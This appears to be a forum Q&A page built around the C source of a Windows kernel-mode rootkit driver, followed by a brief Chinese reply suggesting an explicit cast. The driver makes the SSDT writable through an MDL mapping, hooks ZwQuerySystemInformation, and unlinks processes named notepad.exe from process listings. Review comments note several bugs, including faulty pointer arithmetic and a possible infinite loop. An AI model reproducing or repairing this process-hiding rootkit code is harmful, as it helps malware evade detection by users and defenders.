1. #include "ntddk.h"
  2. #define BOOL int
#pragma pack(1)
// Layout of the kernel's service descriptor table entry (the SSDT). Packed to 1 byte
// so the field offsets match what KeServiceDescriptorTable actually contains.
typedef struct ServiceDescriptorEntry {
    unsigned int *ServiceTableBase;         // table of system-service addresses, indexed by syscall number (see SYSTEMSERVICE)
    unsigned int *ServiceCounterTableBase;  // only used on checked-build kernels
    unsigned int NumberOfServices;          // entry count of ServiceTableBase; used to size the MDL in DriverEntry
    unsigned char *ParamTableBase;          // presumably per-service argument sizes; not used in this file
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()
// KeServiceDescriptorTable is exported by the kernel; it is the SSDT the macros below index.
__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;

// Current SSDT entry for the service that the Zw* stub _function dispatches to.
// The index is the 4 bytes at _function+1, i.e. it assumes the stub starts with a
// 5-byte "mov eax, imm32" (32-bit x86 only); the opcode is never verified.
#define SYSTEMSERVICE(_function) KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]

// SSDT index of _Function, read the same way as above.
#define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)

// Atomically store _Hook into the SSDT slot (through the writable alias MappedSystemCallTable)
// and hand the previous entry back in _Orig. The LONG/PLONG casts hard-wire 4-byte slots.
// NOTE(review): the exchanged value is cast to PVOID; when this file is built as C++ (it uses
// extern "C" below) PVOID does not implicitly convert to a function-pointer type such as
// ZWQUERYSYSTEMINFORMATION, which is the conversion error this page discusses — the
// assignment target needs an explicit cast.
#define HOOK_SYSCALL(_Function, _Hook, _Orig ) \
    _Orig = (PVOID)InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)

// Restore a slot: the same exchange as HOOK_SYSCALL, result discarded. Callers pass the saved
// original address as _Hook; _Orig is accepted but not used.
#define UNHOOK_SYSCALL(_Function, _Hook, _Orig ) \
    InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)

PMDL g_pmdlSystemCall;          // MDL describing the SSDT pages, built in DriverEntry, freed in OnUnload
PVOID *MappedSystemCallTable;   // writable kernel-mode alias of ServiceTableBase obtained via that MDL
// The structures below describe the SystemInformationClass 5 buffer that the hook filters.
// Per-thread record that follows each _SYSTEM_PROCESSES record. Only the layout matters
// here (it determines sizeof(struct _SYSTEM_PROCESSES)); no field is read by this file.
struct _SYSTEM_THREADS
{
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER CreateTime;
    ULONG WaitTime;
    PVOID StartAddress;
    CLIENT_ID ClientIs;          // sic: misspelling of ClientId, kept as-is since nothing references it
    KPRIORITY Priority;
    KPRIORITY BasePriority;
    ULONG ContextSwitchCount;
    ULONG ThreadState;
    KWAIT_REASON WaitReason;
};
// One process record in the class-5 buffer. Records form a singly linked list: NextEntryDelta is
// the byte distance to the next record (NewZwQuerySystemInformation adds it to a char *), and 0
// marks the last record. ProcessName is the only other field the hook reads.
struct _SYSTEM_PROCESSES
{
    ULONG NextEntryDelta;
    ULONG ThreadCount;
    ULONG Reserved[6];
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ProcessName;   // image name; Buffer is NULL for the Idle entry per the hook's handling
    KPRIORITY BasePriority;
    ULONG ProcessId;
    ULONG InheritedFromProcessId;
    ULONG HandleCount;
    ULONG Reserved2[2];
    VM_COUNTERS VmCounters;
    IO_COUNTERS IoCounters; //windows 2000 only
    struct _SYSTEM_THREADS Threads[1];   // first of ThreadCount trailing thread records
};
// Added by Creative of rootkit.com
// Per-processor time counters. Declared for completeness; nothing in this file uses it.
struct _SYSTEM_PROCESSOR_TIMES
{
    LARGE_INTEGER IdleTime;
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER DpcTime;
    LARGE_INTEGER InterruptTime;
    ULONG InterruptCount;
};
// Prototype of the native service being hooked (the Zw* stub exported by the kernel).
// extern "C" means this translation unit is compiled as C++. A space now separates the
// linkage string from NTSYSAPI so a C++11 lexer does not read "C"NTSYSAPI as a
// user-defined-literal suffix.
extern "C" NTSYSAPI
NTSTATUS
NTAPI ZwQuerySystemInformation(
    IN ULONG SystemInformationClass,
    IN PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength);

// Function-pointer type used to call through to the saved original SSDT entry.
typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(
    ULONG SystemInformationCLass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
);

ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation;   // pre-hook SSDT entry, saved in DriverEntry
// CPU-time accumulators for the hidden process. Zeroed in DriverEntry; otherwise referenced
// only from commented-out code in the hook.
LARGE_INTEGER m_UserTime;
LARGE_INTEGER m_KernelTime;
// Replacement for ZwQuerySystemInformation: forwards to the saved original and then, for
// SystemInformationClass 5 (the process list), unlinks the record whose image name begins
// with "notepad.exe" by rewriting NextEntryDelta links inside the caller's buffer.
//
// Parameters and return value are those of ZwQuerySystemInformation; the status from the
// original call is returned unchanged and the buffer is edited in place.
NTSTATUS NewZwQuerySystemInformation(
    IN ULONG SystemInformationClass,
    IN PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength)
{
    NTSTATUS ntStatus;
    // Let the real service fill the buffer; everything below post-processes its output.
    ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
        SystemInformationClass,
        SystemInformation,
        SystemInformationLength,
        ReturnLength );
    if( NT_SUCCESS(ntStatus))
    {
        // Class 5 = SystemProcessInformation. (The original "file and directory listing"
        // comment here was a leftover from a different hook.)
        if(SystemInformationClass == 5)
        {
            // Walk the linked list of _SYSTEM_PROCESSES records.
            struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
            struct _SYSTEM_PROCESSES *prev = NULL;
            while(curr)
            {
                if (curr->ProcessName.Buffer != NULL)
                {
                    // 22 bytes = 11 UTF-16 code units, i.e. a prefix match without the terminator.
                    // ProcessName.Length is not consulted, so shorter names are over-read.
                    if(0 == memcmp(curr->ProcessName.Buffer, L"notepad.exe", 22))
                    {
                        // m_UserTime.QuadPart += curr->UserTime.QuadPart;
                        // m_KernelTime.QuadPart += curr->KernelTime.QuadPart;
                        if(prev) // Middle or Last entry: splice curr out by extending prev's delta
                        {
                            if(curr->NextEntryDelta)
                                prev->NextEntryDelta += curr->NextEntryDelta;
                            else // we are last, so make prev the end
                                prev->NextEntryDelta = 0;
                        }
                        else
                        {
                            // First entry. NOTE(review): SystemInformation is a by-value parameter,
                            // so both assignments below only change the local copy; the caller's
                            // buffer still begins with this record.
                            if(curr->NextEntryDelta)
                            {
                                // we are first in the list, so move it forward
                                SystemInformation =(char *)SystemInformation+ curr->NextEntryDelta;
                            }
                            else // the only process in the list
                                SystemInformation = NULL;
                        }
                    }
                }
                else // record without an image name: the Idle process
                {
                    // Credit the hidden process's time to Idle (Idle is shown as idle time):
                    // curr->UserTime.QuadPart += m_UserTime.QuadPart;
                    // curr->KernelTime.QuadPart += m_KernelTime.QuadPart;
                    // Reset the accumulators for the next pass:
                    // m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
                }
                prev = curr;
                // NOTE(review): NextEntryDelta is a byte offset (see the (char *) arithmetic above),
                // but here it is added to a struct-typed pointer, i.e. scaled by sizeof *curr; and
                // when NextEntryDelta is 0, curr is left unchanged so the while loop never exits.
                if(curr->NextEntryDelta) curr = curr+curr->NextEntryDelta;
            }
        }
    }
    return ntStatus;
}
// Driver unload routine: puts the original ZwQuerySystemInformation entry back into its SSDT
// slot and tears down the writable MDL mapping created in DriverEntry.
// NOTE(review): nothing here waits for callers still executing inside
// NewZwQuerySystemInformation, so a thread mid-call when the image goes away would be left
// in unmapped code — a general hazard of this hooking style that the file does not address.
VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
    DbgPrint("ROOTKIT: OnUnload called\n");
    // Restore the slot. UNHOOK_SYSCALL stores its second argument, so the saved original goes
    // there; the third argument is ignored by that macro.
    UNHOOK_SYSCALL( ZwQuerySystemInformation, OldZwQuerySystemInformation, NewZwQuerySystemInformation );
    // Unmap the alias and release the MDL
    if(g_pmdlSystemCall)
    {
        MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall);
        IoFreeMdl(g_pmdlSystemCall);
    }
}
// Driver entry point. Saves the current SSDT entry for ZwQuerySystemInformation, builds an MDL
// over the SSDT, marks it as already mapped so MmMapLockedPages returns a writable alias of the
// (read-only) table, and swaps the slot through that alias.
// Returns STATUS_UNSUCCESSFUL only if the MDL cannot be created; STATUS_SUCCESS otherwise.
// This is 32-bit x86 code (4-byte slots, LONG exchanges); on x64 kernels this kind of SSDT
// modification is what Kernel Patch Protection is designed to catch.
NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject,
                     IN PUNICODE_STRING theRegistryPath)
{
    DbgPrint("ROOTKIT: Start\n");
    theDriverObject->DriverUnload = OnUnload;
    // Zero the global time accumulators. Original author's note: this is meant to fix the
    // "time problem" — without it the hidden process's CPU time still shows (CPU at 100%).
    // The accumulators are only touched by commented-out code in the hook.
    m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
    // Save the pre-hook entry so the hook can forward to it; the cast is needed because
    // ServiceTableBase holds unsigned int values rather than function pointers.
    OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));
    // MDL covering the whole table; NumberOfServices*4 assumes 4-byte entries.
    // NOTE(review): MmCreateMdl is a legacy API (IoAllocateMdl is the documented replacement).
    g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4);
    if(!g_pmdlSystemCall)
    {
        return STATUS_UNSUCCESSFUL;
    }
    MmBuildMdlForNonPagedPool(g_pmdlSystemCall);
    // Original note: setting this flag makes the MDL mapping writable (and thus readable and
    // executable). MmMapLockedPages then hands back a second, writable virtual address for the
    // same physical pages, sidestepping the table's read-only protection.
    g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
    // NOTE(review): the returned mapping is used below without any check, and MmMapLockedPages
    // is itself a legacy API (MmMapLockedPagesSpecifyCache is the documented replacement).
    MappedSystemCallTable =(PVOID*) MmMapLockedPages(g_pmdlSystemCall, KernelMode);
    // Swap NewZwQuerySystemInformation into the slot via the macro; the previous entry is
    // written to OldZwQuerySystemInformation (the same value already saved above). This
    // completes the two main steps — obtaining write access to the SSDT and replacing the
    // target entry — leaving only the filtering done in the hook itself.
    HOOK_SYSCALL(ZwQuerySystemInformation, NewZwQuerySystemInformation, OldZwQuerySystemInformation );
    return STATUS_SUCCESS;
}


1个回答

Tattoo
2020-02-17 11:22:24

感觉意思是无法从 PVOID 类型转换为 ZWQUERYSYSTEMINFORMATION 类型;
解决方法:尝试下类型强制转换
